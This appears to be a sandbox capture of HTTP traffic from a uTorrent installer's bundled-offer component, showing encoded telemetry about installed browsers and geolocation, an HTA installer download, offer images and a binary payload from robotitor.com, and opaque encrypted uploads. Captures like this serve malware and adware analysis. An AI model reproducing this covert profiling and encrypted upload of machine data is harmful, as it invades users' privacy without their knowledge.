GET /e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFiZWdpbiIsInBpZCI6IjI5NDQiLCJoIjoicjcwUkhTeU5XOE9UTnFMdSIsInYiOiIxMTEyNTgxNzIiLCJiIjo0MzU4MCwiY2wiOiJ1VG9ycmVudCIsImxuZyI6InJ1Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI5LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjQ5LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNTQuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjkuMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9XSwiaXAiOiIxOTQuMjQyLjk2LjIxOCIsImNuIjoiVWtyYWluZSIsInBhY2tpZCI6InJ1X3lhbmRleF9pcyJ9 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: i-50.b-000.xyz.bench.utorrent.com

HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 27 Jul 2017 04:34:46 GMT

Server: nginx

X-Powered-By: PHP/5.4.30

Content-Length: 21

Connection: keep-alive
{"response_code":200}..

GET /json?callback=jQuery1910641311597549105_1501130082345&_=1501130082346 HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: ip-api.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: text/javascript; charset=utf-8

Date: Thu, 27 Jul 2017 04:34:44 GMT

Content-Length: 321
jQuery1910641311597549105_1501130082345({"as":"AS31561 Pitline Ltd","c
ity":"Kharkiv","country":"Ukraine","countryCode":"UA","isp":"Pitline L
td","lat":49.9808,"lon":36.2527,"org":"Pitline Ltd","query":"194.242.9
6.218","region":"63","regionName":"Kharkivs'ka Oblast'","status":"succ
ess","timezone":"Europe/Kiev","zip":""});HTTP/1.1 200 OK..Access-Contr
ol-Allow-Origin: *..Content-Type: text/javascript; charset=utf-8..Date
: Thu, 27 Jul 2017 04:34:44 GMT..Content-Length: 321..jQuery1910641311
597549105_1501130082345({"as":"AS31561 Pitline Ltd","city":"Kharkiv","
country":"Ukraine","countryCode":"UA","isp":"Pitline Ltd","lat":49.980
8,"lon":36.2527,"org":"Pitline Ltd","query":"194.242.96.218","region":
"63","regionName":"Kharkivs'ka Oblast'","status":"success","timezone":
"Europe/Kiev","zip":""});..

GET /endpoint/hydra-ut/os/win7/track/stable/browser/ie/os-region/US/os-lang/en/os-ver/6.1/enc-ver/111258172/ HTTP/1.1

Host: download-lb.utorrent.com

User-Agent: Hydra HttpRequest

Connection: close

Content-Length: 0

HTTP/1.1 200 OK

Server: nginx/1.6.1

Date: Thu, 27 Jul 2017 04:34:33 GMT

Content-Type: application/octet-stream

Content-Length: 2422352

Connection: close

X-bt-sig: aab785dff9d2e469fe2f7cf0b017e9acc68511e2db7159128886044cce4597b0d0b48fc21312b774fb1d4c9e8865f1ff910b4133a4fffed902949f99b7bafd3bca35fcebeb960f7e17f80e472268dc2c7ac19514d5eb03b02a23dc2134e8c4718f0974da498a498606e5f49ca732a92428758906339bce65ce01d7333e20bfdb6bcd9836c98d2fbeb2768fca884a70f0abeb0a30dc6da73bcc2ce64890db047d633d71df255650a2c3c532d71d99c6d9891905922220dde98c2674fbe420bd204576f2396109387c12215ed6b7281770dc8bb0da834e07281b976683fb3c265028c2c377cde59de5ef3bf990f659d728f09a675ec3b9e91561e2d8156d453d5c

Last-Modified: Fri, 28 Apr 2017 05:30:30  0000

Accept-Ranges: none

Content-Disposition: attachment; filename="hta.zip"

X-bt-size: 2422352

Cache-Control: private

X-rl-mx: true

Rule-UUID: de7f6050-4f7c-45cf-a888-37b23152e2e9

Content-MD5: c5aafa98f633fdd4b55bc1e06a620e32

Expires: Tue, 01 Jan 1980 00:00:00  0000

X-bt-hash: 6dc7a1b2d78f8a036606f61d1c9f2c88b6be26e5
PK........U{.J..c.............index.hta<html>..<head>.    
<title>Loading...</title>.    <meta charset="utf-8">
.    <meta http-equiv="X-UA-Compatible" content="IE=9">.    <
meta http-equiv="MSThemeCompatible" content="yes">..    <script 
src="scripts/initialize.js"></script>..    <link rel="styl
esheet" href="styles/common.css"/>..    <!--[if lte IE 8]>.  
  <script src="scripts/es5-shim.js"></script>.    <![en
dif]-->..</head>..<style>.    * {.         overflow: hi
dden;.        margin: 0px;.        padding: 0px;.        z-index: 0;. 
   }.</style>..<body class="installer_body">.    <!-- t
his is the loading img while loading offer page -->.    <div id=
'loading_img'></div>.</body>..<script src="scripts/c
ommon.js"></script>..<script src="scripts/install.js">&
lt;/script>..</html>.PK........U{.Jw[Yy?...?.......uninstall.
hta<html>..<head>.    <title>Loading...</title>
;.    <meta charset="utf-8">.    <meta http-equiv="X-UA-Compa
tible" content="IE=9">.    <meta http-equiv="MSThemeCompatible" 
content="yes">..    <script src="scripts/initialize.js"></
script>..    <link rel="stylesheet" href="styles/common.css"/>
;...    <!--[if lte IE 8]>.        <script language="javascri
pt" type="text/javascript" src='scripts/es5-shim.js'></script>
;.    <![endif]-->..</head>..<body class="installer
<<< skipped >>>

POST /e?i=50 HTTP/1.1

Host: i-50.b-000.xyz.bench.utorrent.com

User-Agent: Hydra HttpRequest

Connection: close

Content-Length: 234

{"eventName":"hydra1","action":"begin","type":"i","cau":"0","pv":"","cc":"0","bkt1":"0","ssb":"1","v":"111258172","cl":"uTorrent","osv":"6.1","l":"en","pid":"2944","h":"r70RHSyNW8OTNqLu","sid":"r70RHSyNW8OTNqLu1501130078","order":"0"}
HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 27 Jul 2017 04:34:33 GMT

Server: nginx

X-Powered-By: PHP/5.4.30

Content-Length: 21

Connection: Close
{"response_code":200}..

GET /e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJvZmZlciIsInBpZCI6IjI5NDQiLCJoIjoicjcwUkhTeU5XOE9UTnFMdSIsInYiOiIxMTEyNTgxNzIiLCJiIjo0MzU4MCwiY2wiOiJ1VG9ycmVudCIsImxuZyI6InJ1Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI5LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjQ5LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNTQuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjkuMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9XSwib2ZmZXJ0eXBlIjoicHJpbWFyeSIsInByb3ZpZGVyIjoiSXJvblNyYyIsImhvd21hbnkiOjEsIm9mZmVyc2hvd24iOjAsInN0YXR1cyI6ImxvYWRfRExMX3N1Y2NlZWQiLCJpcm9uc3JjX29mZmVyX3ZlcnNpb24iOiIxLjAifQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: i-50.b-000.xyz.bench.utorrent.com

HTTP/1.1 200 OK

Content-Type: text/html

Date: Thu, 27 Jul 2017 04:34:46 GMT

Server: nginx

X-Powered-By: PHP/5.4.30

Content-Length: 21

Connection: keep-alive
{"response_code":200}..

GET /img/Rawabere/FS/bg_test_B.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: 9v2SzsaE91OmpFlofAcYI9vs2rkz53xsFz qOBlbJEZV7WCxmQPmPdO5A9t6DJNsUnPP99SZXGQ=

x-amz-request-id: 86C1631DCE907939

Last-Modified: Mon, 19 Jun 2017 10:46:21 GMT

ETag: "f6d24a5c0bba5b766c0c57c6dd66dd08"

x-amz-meta-cb-modifiedtime: Mon, 19 Jun 2017 10:42:39 GMT

x-amz-version-id: 2_EumuZMUwGG5WRCKOcgaKHZcK4VeJf3

Content-Length: 60535

Accept-Ranges: bytes
.PNG........IHDR..............u......tEXtSoftware.Adobe ImageReadyq.e&
lt;...(iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC 2017 (Macintosh)" xmpMM:InstanceID="xmp.iid:50430DE54D0011E790
AFA3BED276D6E7" xmpMM:DocumentID="xmp.did:50430DE64D0011E790AFA3BED276
D6E7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:50430DE34D00
11E790AFA3BED276D6E7" stRef:documentID="xmp.did:50430DE44D0011E790AFA3
BED276D6E7"/> </rdf:Description> </rdf:RDF> </x:xmpm
eta> <?xpacket end="r"?><.......IDATx.....e.U...s..k......
. .<a<.....a..,. ..... ..f.a%Y...nV....1iH...`0.e,....,K.....\RU
..7.{v...s.......s_UI%........{.}.=._...a&................6....}......
2.......I^......[.........gc..._ .\..\..2.....R.%um.........~.}.S.F...
N.......'..:.......Y._J....k.....Y........-.c>?tf....o.|.......5.H.
.s.}[..q.S.._.=..r../......)'W......,..{.;....%_......Y....O......x..[
.h.>....y..............~. ...;.z..W........s.s.e........[...MgyB.D.
.....z*.Z...*...6y.mE......1....}&...A............O._.(.].....?...|...
.....W..Hy..g.x.../fy..^.........L.'....1.Aê.....=.'..W../_?D...
<<< skipped >>>

GET /img/Repererarer/RS_RA_V1_FS.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: application/octet-stream

Connection: keep-alive

x-amz-id-2: IEc68Oj7zuq93zUT3DR1FPw2O1YomsLp1qIhXCGany/4lsdzjUCJdlOZ2sHkGlJK

x-amz-request-id: A2B51E227D7AF57F

Last-Modified: Sun, 21 Aug 2016 14:42:40 GMT

ETag: "d30a4ce9b2791429f33856115a5d9e43"

x-amz-version-id: AOJ5_u7mGmA6pZLOEWrSJIfP7WXn6nRx

Content-Length: 74930

Accept-Ranges: bytes
.PNG........IHDR.............W. .....tEXtSoftware.Adobe ImageReadyq.e&
lt;..$TIDATx.....de}...S..~...e."..;.[D.D.-.......%JL./.E.Q..(b.-.I...
"(...Rv..w..i.<..}...{..^.P..2_......;{..|.....e..mhC;.Yc..........
..l....A.Z......,].7.kZM]o..s....bo....EN..(....~'.....nP....'.vbn.u`,
j..%.........Y9.Aj]._..!...sc.A.Rc5KS.....a.5"..1.T.(..gU...Ynm..c.P.q
Ee.Q.Vpw...1B.0P..........x7.....E..Xt$...TK*....,.L...Y...0ar.#.[.#B.
Mp....4A..xZ/j.-.. .-&.b.....Z.....6.K.s.4.t.1.F.L.......X.`<F0.m..
d.%......i......'.._....m.c.x&...Cfa.8..d.........N..Eu.G.%.u..A,....h
.tB.....Sc,.i.....Is.zh...%.#^....a.q.0....m......3..|...- ..(T~..v...
..C*..H4..!.L.f".-....:w8.##....Pi....y...1#Zy...w...2...*aT.."S\...#.
OR.rd.8..,...A.......gAf8.-P[N..:.4.v..3&.j7....... ^.._...6...xd..lt.
Uyh..."...klbL-o5.......z8.uG.7"..}.Y........P,.tfN.?.....A...|..#..`M
.a.M...J ..L........v....UG..4..W..FiS4.,...........W.Kl.@9w..*ODe.J..
.A.b..I.)E.&.... .r-.x.....XD.%......(3@.......,.Hzp....o4..t7.[.X.&K.
].T0^M....Q..=`...0.V...\6.....A.....C.=...mM.....m.......z,.B.4...v..
... .l..ln..M.}:...Rw.~~.v......{...]..A.6...f...N..\..c.v&...... d..,
.~.... .P).Y.j..).c..1..r.R.F!BC..,...79S..n..F{&.d..=`.V]/. s..V.d...
.ZI.Ai.pi.W.VB.4.....P.i.B.X......72...3.c...T?.d.S.|a.X.....[.7...:'.
...V...S....=...............v..l8..].i...LF7.'....5..tt.o..ZV..LU..6.e
j1.yC.a.e..Nh...-.7.I..\a-.%...I.i....Y..6....i./.e...1fq....~)...s.D.
.M..Y...>.2...s.A.z.T-.2.jJ.c5.... ......cd...*.;).. .*J..'...0P.0I
x...i.Q.w...b_b.8..b.....n5[.j........;!.........Q.........A>.v
<<< skipped >>>

GET /img/Repererarer/ADBlock_icon.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: JxIFmoQ7Co3ouaduEiROPzorzCguyUXYqoPfLFQDV5Mm2Vb3tX4rR6JgYzEySowf

x-amz-request-id: F0713B953CCE3876

Last-Modified: Thu, 22 Sep 2016 08:20:17 GMT

ETag: "5e816400b3e89d54b35d13936078917d"

x-amz-meta-cb-modifiedtime: Thu, 22 Sep 2016 07:05:00 GMT

x-amz-version-id: Y8Aj2SOnoDLA.v9eA0ercGpbs7X3tg.n

Content-Length: 433

Accept-Ranges: bytes
.PNG........IHDR..............b.w....pHYs...........~....cIDAT8....J.P
....i..B.......:.TA......B@}.........."(.-..f...N]:(t.]..........$.|'.
.{..8.a2-......k...e.`Zv.(.. ......5...j-.v.b.h5.6..s;.1..n.......$.x\
..J....k........gwG..<>=.... .5O:..y}...h..|.X<....x..D...%n.
......j..........B... .>[.#...[...."dB].R....._.....L&C....](..`Z.%
p<.!..9..M.nx.{.}...k...........W....ke......~..Bq.d.:.-.=..LB....d
...k_.._&n.=../.....IEND.B`.....


GET /img/Repererarer/Battery_icon.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: 1r4OLXnZ3i5jv3aMmh7vaPeDbcrL5LptFsbPcHrUtCbWA20uSaRj0WtdgcK4SxOu

x-amz-request-id: 87182EDECF34EFF0

Last-Modified: Thu, 22 Sep 2016 08:20:18 GMT

ETag: "b1ea974669be29084ba04d57aa795988"

x-amz-meta-cb-modifiedtime: Thu, 22 Sep 2016 07:05:00 GMT

x-amz-version-id: 9HCRR_Pwqta8lx_cu4Btdt31hqNyBSRU

Content-Length: 213

Accept-Ranges: bytes
.PNG........IHDR.............R|......pHYs...........~.....IDAT(......P
...........F`.<...[..(..u.<UhF@"..S....q........i.3........ ..j.
@.u.M.n.f..l....T..J._$e&.@....C. q....d..../.0..6...:#....I......O...
.IEND.B`.....


GET /img/Repererarer/Video_icon.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: aOyGRLo6jA3fFsbG6DzRsOiLs2FrBVeJFChrz7xnXXSFJoZuJeXL8bT1cMIv3EKI

x-amz-request-id: 3773E4231224332B

Last-Modified: Thu, 22 Sep 2016 08:20:19 GMT

ETag: "a4a53ed95919d0af414999843d857200"

x-amz-meta-cb-modifiedtime: Thu, 22 Sep 2016 07:05:00 GMT

x-amz-version-id: e4C91.5N8bSeslgCWQw1g.MmaISz0mHM

Content-Length: 312

Accept-Ranges: bytes
.PNG........IHDR.............;mG.....pHYs...........~.....IDAT8...... 
..?M...n`7.'..H...@G.@H8Y7..t......M.P...........4MC.....3.u.).....M6.
.........R y.....=d.:....2..c.. &.v".c......a.Z?...C.........".VR.u..j
%..............._"3..V.../N.._.).@,N.#.(..p.^..#..,c..e....RNrc]..:..g
6..~.T#.t~..R.?.........IEND.B`.....


GET /img/Repererarer/VPN_icon.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: img.robotitor.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.0.10

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: image/png

Connection: keep-alive

x-amz-id-2: HLbVkXaN6xbNGqtKaB0n PZ78nXKs/GGAtfBpdMyNtbI5wSYz3MNw3kg/EA8VGkR

x-amz-request-id: 8E523355DE9B5D0E

Last-Modified: Thu, 22 Sep 2016 08:20:18 GMT

ETag: "4f6b5c8c89387a1c5a00cf0c0c96d5d8"

x-amz-meta-cb-modifiedtime: Thu, 22 Sep 2016 07:05:00 GMT

x-amz-version-id: J8vHuealvtq0Fd33re6woJr5dh0EuJu_

Content-Length: 364

Accept-Ranges: bytes
.PNG........IHDR.....................pHYs...........~.....IDAT(....J.`
....B.4.4iK@.....?`-....z.z..j........)j.AR..K..f...). ..g:..}...$I...
e.....*......7}.....,.8&.c...F-..,.K.`.c.x./...iUI...[\].p.:.4.j......
...i.u.....(3./p......}t..eY...D.O.f..b%..B.l8ko....2f.o...D....(..L2.
.........O.Z.u.g...=.;....i..J.0<.N..X,f.){..<.....yA.2K...$...7
..w.u.......IEND.B`...

GET /ofr/Solululadul/icc_v5_8.cis HTTP/1.1

Range: bytes=0-506657

Accept: */*

Host: cdnus.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Server: nginx/1.10.2

Date: Thu, 27 Jul 2017 04:34:48 GMT

Content-Type: application/octet-stream

Content-Length: 506658

Connection: keep-alive

x-amz-id-2: ItT16vhQBA6GvGtgRLdHMVu8yVXC3hjHC XP4WFXUH1/7henya9pre1JP0vwTDmL0wYOAv4yZOY=

x-amz-request-id: 6505A054EB4BFC0C

Last-Modified: Mon, 05 Jun 2017 11:20:09 GMT

ETag: "d3275dae3b2da9508907b2e97cd72712"

x-amz-meta-cb-modifiedtime: Sun, 04 Jun 2017 11:47:23 GMT

x-amz-version-id: B1J2nyfjCWzZziCw.awfI7I4ql6woVzG

Content-Range: bytes 0-506657/506658
CIS................_.......".......P.......u..uYX.nA!9Y..M............
...EY9CC3..GF..S3_<.Q[aW6].....L...L...#a!...|2...s..y..l... ....-.
D.c....E..Hs..v......Ok.$...U/..W..3..h;O........3........0-..d.....8i
..*Q .T.Zl.q.8..Sj......y.{........nT.2....s.Zw...H....`ig.`N.../Z..MJ
O..i......w6*../.t.<.-..p..W5...V7.=.lkV...Z.`.P.ba.8.h'.0..<...
WH.[.TT....e$..=........`..(....:...fY}K.L..l.}7..N.QWx%.(].*.m....T..
........{.w..7..X.gJ'7D......y.G.<|-.......Vy.[,.O*../.4.......9..L
(...)s.g,%.=...i...e.4...T......dS...;..2r.......Bo....9..8Y..?.4.....
(.Y)0..I..#....dzp)s.J.....[..../....Z...=f.C....,...:.....A.,)...N..'
S....v....p.~n........ h......G....i6A.m..} .(I.sn..... ...!.K..!.....
.X....D..I...P"......o...h.b.Xn...N...5.y.0-.L.>....Zh<2-..^M...
..W. ...]...A.....'%.....9.:.Ta.-..3..x.....s,W1w................I.!.)
)g..~..c..B.V..[....o%.g......z.V..j..FU.*....A..SJ.I7i.. .......x...r
u.....Uf-........>../.LXgA..zk..4.u{....`...E....j......yw.....?j..
hzD..V.....0.3..._..n.*.....s)....c..g*..ox..5u.:O..|....D...Z.u.m.R.(
a.....,.D....h.yg..?..UE..]\....'.z..m...sOG._m....K...I......a.I9....
}..H..P..D...zk46..V.....Zw...!.._B..........|..Z.Xq.dSx..]...ur7..G..
..x......b..L.}$;..@.....]>...-.{..J...[.|A.*6......EKy...@..(U|_.o
8.l...tf........H.......s......c(.%M.._*...&?. .Ni..2...(.R.%.R.M..!..
&G.....n..VW..m....~x.CE.p5.....................0..{Q.{....N8.B!#..a{.
..L..D.....v*.U.;:.8...I...Z...e^3..gl&.i`Q...l.p...q..J.Ki.]..I.....i
t.......W..*x..................Eo.>..c..z......6...w.,mV>...
<<< skipped >>>

POST /?v=2.0&subver=6.21&pcrc=1696256498 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 2320

Cache-Control: no-cache

...3E.Q)_l.y...K....2l~..}5.M.4..*........>..W.a.......1^.[.@du...."\..?".Rol.;_3b$... ...Ie..$.B.;.!.e$2..6.A._.hd..B..5.%...j...~dfx..L_\..g.O..\...........R..........i..-..."X..%..<6...x ....._....[:.j'.C.4`.zc.'...!.9....

.Wn}.....G...........}<........Y..w..f.ed.'..)......j.q.t,M..~.......;..G...mu<..OG,.
.},M..?.1....n.E.7..Xx87.%.zN%2......H.Hy.."`..V....yA......DqJ...T....nX.07...K".!.&..%/...o.........W.....w....yj..]..%U."P...,..]...v./.Iz.9y3e .-...j._]G...7OI..0...\..?.... ..,..G......\.....j..ERD.w9.....Bc....w
..C.~....z7.........Fhq.}...rs...K.a^...lv...a.3......\2..C...8..'....._.M..O'pP.g....J

.%J.......w.E.5i...........

4.R..Su.._UWG...6.....U....h`...w.B.98(Q.-D....z;M...]."u.hZ..FG`@.5...P..^G..S..b.qz..f..S........U$..v.#B .f..@.h.. s.lK..Tm.6..U.l.!! .......=&...1..F^.....$_..B..o...S...]@.'.<.(........a..

2..v.(..47.`...Q....... .O.j.....L..Z.|.Z...op..? K.{................8.......ANO..^..A...z[!.\.Nx[|p...$.!V.hF.J/..p...a.a.6e."v..a.W.u..M7.4?.i...F.A`:..;......Dg....s....4.\.;.<=...):......s...b.6$.I..........wF.q..>7.......K.a%.bG@S...s0K.5.}..n%{Q.`K.#.d........?p.j.J..T....(.m.J...v.96J'.@Fd.s.T...^R..r=.C|b...{....T....?z(./..7.......f X.F...Q#...r.<y...jD%~q....0

...l....vN.

.J"b..o..6W.x)a.QmL..a..47...SM.<l.....z...O..W. .....b.K
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:45 GMT

Content-Length: 4

Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu
, 27 Jul 2017 04:34:45 GMT..Content-Length: 4..Connection: keep-alive.
.DONE....


POST /?v=2.0&subver=6.21&pcrc=391853196 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 2912

Cache-Control: no-cache

.I..~...$$.......Nn8>&....''9LZ.I.)...~.B.!"...K.n../.;.9Ja%....bI.5'^.{2O;..b.......&.;.K^.esx...RC.o\..
T...z/.....2r..../?.........!g...yAsH6j....8..c....?....R.cb..;..C..j.~.m.
.Yi.R,.....1._:...j......

......j.,a.&I..3.;.Cp.2...v....@oJ!^c\.G p.. (..........:bZ.i-..vT..FK.s..&
.......L&\.C....M(#z^<m.........a/...G.(.v..St....su.........^..4).wyx..^.....[?.....i...v.,w0.....$L...{1b.t.Jv

&.;g..d..Q..u^.C.....F..6.}K.Z..D....J.b...j.I;...%..*..2....z....P....2.e"...Dn.aB.&K..S.T.....L|@.....In#.C..>[............3j^..m{`.O...5$`-z..[.. ..!d_x0.....0....w0.`{}...us.y. ....`...... ..i.A....... ..o....=..
u.L.. \.$........#.>..,=bc....dRX...%..........&.......7S.]l..........-$....;.kxx.....x4K..._..N7C..@....#".cg.[....3...m9..k..S.?rly....t[..
Q5..~...Ht...k..=..._B....}.`.. !....1r./.$..4q...Jo-O6.....".fK...N....S.V...p.....<.....:I1 .0.w2..0.R......V....a\?j-.

5 rF.......F".`......R.....4.<l.$....(.CY.#).F...X...I.].....B.M..E..._..2..^g..GN....MYT......."F....O..>.F.]..0. !_.O.I..e?Jk....>.e..........Pi.=z8.....-.........3.rjU..T...'C...y.3(.=..F^..../6...H...L.x....|..'Q....A....S........).. lR.....X.n.C.%<.<...a......."L..T..5.i.._..'.../.

.t..I..h.....t.iNA.I..

.......#.....R./....;.:..N..,....6..}...@..15.^..Y...%..9.

Z..h....gi.;d...$..KD...n,65..:N..
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONE....


POST /?v=2.0&subver=6.21&pcrc=1961982617 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1936

Cache-Control: no-cache

....V.....2$......@..........

@V.Y.jN.nt.d..o.wI.....A......... ......s.....j...v..Z......g...C...GS..&......!:.`>.A..mR.b.!.vB.wv..>..Id..i....b..8.. i .....<.m.D..q.AP .L....w;pY..........B..qF.......UG.O....t7oU.3.OQ.S."LttE.$_..2.M\.i....@V.).....m.:u..n.....kj..W.6...c.WT...g.U..x...g;...y-.Z..)X.......a.......J.I^....|t..A/.....v'V....@. ....3....R...y.p....?r..........[.=Fy.)&cG.....kM..... ....C$.x.}...M.T....ny&g..v..%.%8...0#ioe..do.....v.....8..'`..g...K
..7..#...T.M..hD.S...e..{g\......E
PmRx../'p...O_9....w.....3..w{.N.!  jG...q.X.......I.!...=...?m..$;(...&...U......M.C..........z6.%.*.B.dlm..

...9.B...W.u...dt.:.............W.....^Y..~8......4...~U*.RV.FA. y..pMGZ....q.1....0.^..\...&...|sX.n..9.ny.....i*..H<5cX...Y.G.....|ON..I.tw{.L..H..n..M9\.."..&I.s.... .-L.....K.b...0.......2.j..-DJ.......<.5.^9.V..6.A.$:.|R..Nq.R.p..R...........7..OC.*.....8...2..'.......2....<X.......%...\....v.a..Z.#9C.....Hy......z...@..FgX..I...Y b....H...f..#g..g.`.5..R.fCE
g.1....Nv.2.m_h(K....J...C..Q."_...6...J...y..i.......:M...4...Q..y..
.z8....j.jv0,k...w.jZF.X..S...m....ITE........n..~.(....4..W.....#SqA....98..V......2NW.H..),.. ... ...*\....H..~WK/!.....C9..D.w|.q,.....F...r...t8.P ..-Q...>..f..?...|. 3O.rH.JZ.6#....8..q..W.......~.vf.U.\..\..........e864...1j....._S..N
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 27 Jul 2017 04:34:47 GMT

Content-Length: 4

Connection: keep-alive
DONE....


POST /?v=2.0&subver=6.21&pcrc=1692931391 HTTP/1.1

Accept: */*

Host: rp.robotitor.com

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Content-Length: 1936

Cache-Control: no-cache

I'.........a.o.~<..=0..T.|O.......c.r..M.jc.y{r.si !....X..w2.......$/x.:y.(.v~".......&.K?
